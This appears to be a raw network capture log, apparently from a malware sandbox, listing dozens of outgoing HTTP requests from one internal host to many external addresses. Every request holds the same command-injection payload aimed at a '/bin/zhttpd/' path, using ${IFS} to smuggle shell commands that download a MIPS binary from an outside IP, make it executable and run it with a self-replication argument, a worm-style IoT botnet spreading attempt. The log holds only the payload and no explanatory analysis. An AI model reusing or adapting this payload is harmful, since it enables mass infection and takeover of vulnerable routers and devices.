                                        Jan 14, 2024 16:18:56.740884066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7564192.168.2.135206264.137.12.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740938902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7565192.168.2.1343554198.50.97.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.740999937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7566192.168.2.135525440.169.119.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741028070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7567192.168.2.134815837.17.44.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741100073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7568192.168.2.1339738197.198.247.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741163969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7569192.168.2.1339938182.144.235.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741231918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7570192.168.2.134094440.23.206.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741287947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7571192.168.2.1347792203.131.58.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741385937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7572192.168.2.1348370163.210.225.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741422892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7573192.168.2.1345928115.94.5.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741470098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7574192.168.2.1352516183.5.17.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741533995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7575192.168.2.1347822185.239.16.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741590023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7576192.168.2.135126477.18.7.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741641998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7577192.168.2.134660234.71.181.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741703987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7578192.168.2.1340376105.27.62.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741786003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7579192.168.2.1344050198.124.182.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741858006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7580192.168.2.1345670194.22.81.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741878986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7581192.168.2.1360062204.40.183.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.741950989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7582192.168.2.1345032175.80.80.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.742487907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7583192.168.2.1350638138.135.210.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.743520975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7584192.168.2.1340820160.109.88.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.744425058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7585192.168.2.1356220151.57.59.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.747278929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7586192.168.2.134179892.9.203.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758368015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7587192.168.2.1334796223.212.15.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758411884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7588192.168.2.1358572221.130.45.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758488894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7589192.168.2.1355984129.94.130.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758558989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7590192.168.2.133813468.25.108.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758610964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7591192.168.2.1354828189.132.83.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758702040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7592192.168.2.133904652.173.18.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758744001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7593192.168.2.1339874112.123.220.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758817911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7594192.168.2.1360582107.89.193.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758879900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7595192.168.2.133404234.26.13.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.758968115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7596192.168.2.1345608167.27.39.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759002924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7597192.168.2.133744432.252.100.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759064913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7598192.168.2.13563409.16.146.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759552956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7599192.168.2.134722063.222.103.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759629011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7600192.168.2.135174054.73.188.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759670973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7601192.168.2.1339924184.221.13.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759731054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7602192.168.2.134593698.255.236.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759799957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7603192.168.2.1334406142.225.51.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759866953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7604192.168.2.13370749.11.180.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759911060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7605192.168.2.133456090.44.40.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759962082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7606192.168.2.135373670.123.86.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.759996891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7607192.168.2.1349550173.231.30.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760057926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7608192.168.2.1348486193.225.155.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760111094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7609192.168.2.1341968156.163.112.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760144949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7610192.168.2.1342020125.130.244.92443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760205984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7611192.168.2.135707840.47.182.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760267973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7612192.168.2.1360402103.43.193.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760314941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7613192.168.2.13416802.80.227.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760397911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7614192.168.2.1350000188.129.203.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760463953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7615192.168.2.1340048204.76.231.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760469913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7616192.168.2.1351774112.117.51.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760582924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7617192.168.2.133327891.26.218.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760628939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7618192.168.2.134497079.239.88.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760699987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7619192.168.2.1347598197.92.224.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760740995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7620192.168.2.1356206203.65.115.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760780096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7621192.168.2.1351250110.151.41.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760831118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7622192.168.2.134756670.170.117.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760895967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7623192.168.2.1335938105.158.249.236443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.760958910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7624192.168.2.133705871.32.254.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761001110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7625192.168.2.134142227.36.75.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761071920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7626192.168.2.1349330108.176.136.169443
                                        TimestampBytes transferredDirectionData
